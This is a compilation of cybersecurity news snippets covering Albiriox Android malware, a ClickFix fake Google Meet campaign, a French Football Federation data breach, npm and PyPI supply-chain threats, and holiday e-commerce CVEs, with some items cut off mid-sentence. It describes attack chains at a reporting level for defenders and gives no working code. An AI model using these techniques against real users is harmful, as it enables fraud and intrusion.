A sophisticated threat actor has been operating a private Out-of-band Application Security Testing (OAST) service hosted on Google Cloud infrastructure to conduct a large-scale exploit campaign targeting more than 200 CVEs, according to new research from VulnCheck. Private OAST Domain Raises Red Flags Security researchers at VulnCheck identified unusual activity involving callbacks to detectors-testing.com, an unfamiliar […]
A dangerous new Android malware called Albiriox has been discovered by security researchers, posing a serious threat to mobile banking and cryptocurrency users worldwide. The malware operates as a Malware-as-a-Service (MaaS), allowing cybercriminals to rent access to this powerful hacking tool for monthly fees ranging from $650 to $720. The Cleafy Threat Intelligence team first identified Albiriox […]
A sophisticated new Android malware family dubbed “Albiriox” has emerged on the cybercrime landscape, offering advanced remote access capabilities as a Malware-as-a-Service (MaaS).
Identified by researchers at Cleafy, the malware is designed to execute On-Device Fraud (ODF) by granting attackers full control over infected devices, allowing them to bypass security measures and drain financial accounts.
Albiriox first appeared in September 2025 within exclusive underground forums, transitioning from a private beta phase to a public commercial offering by October.
The operation is believed to be managed by Russian-speaking threat actors who have aggressively marketed the tool. The service was launched with a subscription model, charging affiliates approximately $650 per month to access the malware’s comprehensive toolkit.
Unlike simple credential stealers, Albiriox is engineered for real-time interaction. It leverages a VNC (Virtual Network Computing) module that streams the victim’s screen directly to the attacker.
This allows criminals to perform banking fraud manually on the victim’s device, often while the user is unaware, effectively circumventing device fingerprinting and two-factor authentication (2FA) protocols.
Two-Stage Infection Chain
The distribution of Albiriox relies on a deceptive two-stage process designed to evade detection. Early campaigns targeted users in Austria using a fraudulent version of the popular “Penny Market” application. The infection chain typically follows these steps:
Social Engineering: Victims receive SMS messages with shortened links promising discounts or prizes, redirecting them to a fake Google Play Store page.
Dropper Installation: The user downloads a dropper application (e.g., the fake Penny app).
Payload Delivery: Once installed, the dropper requests “Install Unknown Apps” permissions and fetches the actual Albiriox payload from a command-and-control (C2) server.
Recent iterations have evolved to include WhatsApp-based lures, requiring users to enter phone numbers to receive download links, further filtering targets to specific regions like Austria.
Albiriox’s architecture focuses on stealth and control. It utilizes “Golden Crypt,” a third-party crypting service, to render the malware Fully Undetectable (FUD) by static antivirus engines. Once active, it employs Accessibility Services to execute overlay attacks and keylogging.
The malware comes hardcoded with a target list of over 400 applications. This extensive list includes major traditional banking apps, cryptocurrency wallets, and payment processors worldwide, Cleafy added.
The following table outlines the technical profile of the Albiriox operations observed during the analysis.
Albiriox’s rapid development cycle suggests it is positioning itself as a dominant tool for financial fraud. Its ability to combine screen streaming with accessibility manipulation enables threat actors to operate invisibly behind black-screen overlays, making it a critical threat to financial institutions and Android users worldwide.
A new, highly sophisticated malware campaign has been identified targeting remote workers and organizations through a fake Google Meet landing page.
Hosted on the deceptive domain gogl-meet[.]com, this attack leverages the “ClickFix” social engineering technique to bypass traditional browser security controls and deliver a Remote Access Trojan (RAT) directly to the victim’s system.
The attack begins when a user navigates to the fraudulent site, which is visually indistinguishable from the legitimate Google Meet interface. Instead of a video feed, the user is interrupted by a pop-up error message, typically claiming a camera or microphone issue titled “Can’t join the meeting.”
Unlike standard phishing that asks for credentials, this page offers a technical “fix” that requires physical user interaction. The prompt instructs the victim to perform a specific sequence of keystrokes: Press the Windows key + R, then CTRL + V, and finally Enter.
Unbeknownst to the user, clicking the “Join now” or “Fix” button on the page triggers a JavaScript function that copies a malicious PowerShell script to their clipboard.
By following the manual keystroke instructions, the user unwittingly pastes and executes this script via the Windows Run dialog, effectively bypassing browser-based security filters such as Google Safe Browsing and SmartScreen.
Forensic Analysis and Indicators
Recent incident response activities involving gogl-meet[.]com have confirmed that this chain leads to a RAT infection. Forensic analysis of affected systems identified the infection’s root cause through the Master File Table (MFT).
Specifically, the MFT entry for the dropped payload revealed critical origin data in its Alternative Data Stream (ADS), capturing both the ClickFix downloaded file and the referrer URL gogl-meet[.]com.
This forensic artifact is crucial for defenders, as it definitively links the execution of the RAT back to the browser-based social engineering event rather than a typical drive-by download or email attachment.
A distinct characteristic of this wave is the obfuscation used within the PowerShell payload itself. Threat actors have begun padding the malicious script with extensive comments containing trusted visual symbols, such as repeated green check marks ().
When a user pastes the content into the small Windows Run box, these symbols may be the only visible text, visually reassuring the victim that the command is “verified” or safe [memory].
This tactic also serves a technical purpose: it can push the actual malicious code (often an IEX download cradle) out of the immediate visible area of the dialog box, masking the script’s true intent.
While ClickFix (also associated with clusters like ClearFake) gained significant traction throughout 2024, this latest iteration demonstrates a shift toward hyper-targeted branding.
Early campaigns impersonated generic browser updates or Word errors. Still, the shift to Google Meet simulation suggests a pivot toward targeting corporate environments where video conferencing glitches are a common, trusted friction point.
Security teams are advised to update detection rules to flag PowerShell execution strings originating from the Run dialog that contain unusual Unicode characters or extensive comment blocks, which are tell-tale signs of manual execution.
The French Football Federation (FFF) has confirmed a significant cybersecurity incident resulting in the theft of personal data belonging to members and licensees.
The federation revealed that cybercriminals had infiltrated the centralized administrative software used by football clubs across the country to manage memberships and daily operations.
According to the disclosure, the breach was not the result of a software vulnerability, but rather unauthorized access obtained through a compromised user account.
This compromised credential granted the attackers administrative privileges, allowing them to navigate the system and exfiltrate sensitive databases before the intrusion was halted.
Scope of the Stolen Data
While the FFF has stated that the breach is limited to specific data sets, the information exposed is highly sensitive personally identifiable information (PII). The federation confirmed that the attackers accessed and stole the following details regarding club members:
Full names (First and Last)
Date and place of birth
Gender and Nationality
Postal addresses and Email addresses
Telephone numbers
License numbers
The exposure of this specific data combination creates a “full identity” profile for affected individuals, significantly increasing the risk of identity theft and targeted social engineering attacks.
Upon detecting the unauthorized activity, the FFF security teams took immediate defensive action. The compromised administrator account was disabled to cut off access, and a mandatory password reset was enforced across the entire software platform to prevent attackers from laterally moving.
In compliance with French law and GDPR requirements, the FFF has filed a formal complaint regarding the criminal act. They have also notified the relevant regulatory authorities, specifically the National Cybersecurity Agency of France (ANSSI) and the National Commission on Informatics and Liberty (CNIL).
The federation is currently communicating directly with all individuals whose email addresses were found in the exfiltrated database.
The FFF has issued a strong advisory to all licensees to remain vigilant against phishing attempts. Security experts warn that threat actors often use stolen PII to craft convincing emails or SMS messages that appear to come from official sources—in this case, the FFF or a local club.
Members are advised to treat any communication requesting banking details, passwords, or urging the opening of attachments with extreme suspicion.
The federation emphasized that it is constantly strengthening security measures to cope with the “increasing number and new forms of cyberattacks” targeting the sports sector.
Cybersecurity researchers have discovered vulnerable code in legacy Python packages that could potentially pave the way for a supply chain compromise on the Python Package Index (PyPI) via a domain takeover attack.
Software supply chain security company ReversingLabs said it found the “vulnerability” in bootstrap files provided by a build and deployment automation tool named “zc.buildout.”
“The
The North Korean threat actors behind the Contagious Interview campaign have continued to flood the npm registry with 197 more malicious packages since last month.
According to Socket, these packages have been downloaded over 31,000 times, and are designed to deliver a variant of OtterCookie that brings together the features of BeaverTail and prior versions of OtterCookie.
Some of the
The 2025 holiday season has unleashed an unprecedented wave of cyber threats, with attackers deploying industrialized infrastructure to exploit the global surge in online commerce.
This year’s threat landscape is characterized by a calculated expansion of deceptive digital assets, where criminals leverage automated tools to scale their operations across multiple merchant categories.
The primary vector for these campaigns involves the mass creation of look-alike websites designed to mimic legitimate retailers and capture sensitive consumer data during peak shopping periods.
One of the most significant indicators of this pre-holiday offensive is the registration of over 18,000 holiday-themed domains in the past three months alone.
Targeting high-traffic keywords such as “Christmas,” “Black Friday,” and “Flash Sale,” these domains serve as the backbone for phishing schemes and fraudulent storefronts.
Many of these sites mimic household names with slight URL variations, making them nearly indistinguishable to hurried shoppers.
While a portion of these domains remain inactive to evade early detection, hundreds have already been weaponized to host gift card scams and payment-harvesting pages.
Fortinet security analysts identified this extensive network of malicious infrastructure, noting that the campaign’s scale facilitates effective SEO poisoning.
By artificially inflating the search rankings of these malicious URLs, attackers ensure their fraudulent sites appear alongside legitimate results during peak traffic.
The researchers further highlighted a disturbing rise in credential theft, with over 1.57 million login accounts from major e-commerce sites currently circulating in underground markets.
These “stealer logs” contain browser-stored passwords, cookies, and session tokens, enabling rapid account takeovers that bypass traditional login defenses (Figure 1: Domain Registration Trends).
Technical Exploitation of Platform Vulnerabilities
The sophistication of these attacks is most evident in the targeted exploitation of critical e-commerce vulnerabilities. Attackers are actively leveraging CVE-2025-54236, a critical flaw in Adobe Magento caused by improper input validation.
This vulnerability allows threat actors to execute a remote code execution (RCE) attack, effectively bypassing authentication layers to achieve session takeover.
By injecting malicious payloads into unvalidated input fields, attackers gain administrative access, enabling them to install persistent backdoors or JavaScript-based web skimmers directly onto checkout pages.
CVE ID / Threat
Platform & Component
Vulnerability Type
Severity (CVSS)
Impact & Exploitation Details
Remediation / Action
CVE-2025-54236
Adobe Commerce & Magento Open Source
Improper Input Validation
9.1 (Critical)
Active Exploitation (SessionReaper): Allows unauthenticated attackers to hijack sessions and achieve Remote Code Execution (RCE). Over 250 stores confirmed compromised. Attackers use this to inject skimmers and steal admin access.
Patch Immediately: Apply Adobe Security Bulletin APSB25-88. Ensure versions are upgraded to 2.4.7-p8, 2.4.6-p13, or 2.4.5-p15.
CVE-2025-61882
Oracle E-Business Suite (Oracle EBS)
Unauthenticated RCE
9.8 (Critical)
Ransomware Target: A flaw in the BI Publisher Integration allows attackers to execute code remotely without login. Actively used by ransomware groups (e.g., Clop) to steal ERP data and disrupt inventory/order systems.
Update: Apply the Oracle Critical Patch Update (October 2025) immediately. Isolate EBS from public internet access if patching is delayed.
CVE-2025-47569
WordPress WooCommerce (Ultimate Gift Card Plugin)
SQL Injection (SQLi)
9.3 (Critical)
Database Exfiltration: Unauthenticated attackers can manipulate database queries to dump sensitive customer data (PII) and admin credentials. Darknet markets are currently selling access to breached stores using this flaw.
Update/Patch: Update the WooCommerce Ultimate Gift Card plugin to version > 2.8.10. If unable to update, disable the plugin immediately.
CVE-2025-62416
Bagisto (Laravel-based Platform)
Server-Side Template Injection (SSTI)
Critical (Risk)
RCE via Product Description: Attackers with product-creation access can inject malicious template code into product descriptions. When rendered by the server, this executes arbitrary code, leading to full server takeover.
Update: Upgrade Bagisto to version v2.3.8 or later. Sanitize all product description inputs if using older versions.
CVE-2025-62417
Bagisto
CSV Formula Injection
High
Admin Compromise: Malicious product data (e.g., in a CSV export) can trigger formula execution when an admin opens the file in Excel/Sheets, leading to command execution on the admin’s local machine.
Update: Upgrade Bagisto to v2.3.8. Avoid opening untrusted CSV exports directly in spreadsheet software without sanitization.
Additionally, the exploitation of CVE-2025-61882 in Oracle E-Business Suite permits unauthenticated RCE, allowing ransomware groups to paralyze backend inventory systems.
These technical incursions are executed via automated scripts that continuously probe for unpatched systems, transforming a single vulnerability into a gateway for massive data exfiltration.
This systematic exploitation underscores the critical need for merchants to apply patches immediately.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The holiday season has always been a magnet for increased online activity, but 2025 marks a new high-water mark in cybercrime intensity. FortiGuard Labs’ latest research spotlights a dramatic surge in the volume and sophistication of attacks targeting retailers, e-commerce providers, and consumers during key shopping events. Attackers are leveraging automation, AI-powered infrastructure, and sophisticated […]
As IT environments become increasingly distributed and organizations adopt hybrid and remote work at scale, traditional perimeter-based security models and on-premises Privileged Access Management (PAM) solutions no longer suffice. IT administrators, contractors and third-party vendors now require secure access to critical systems from any location and on any device, without compromising
).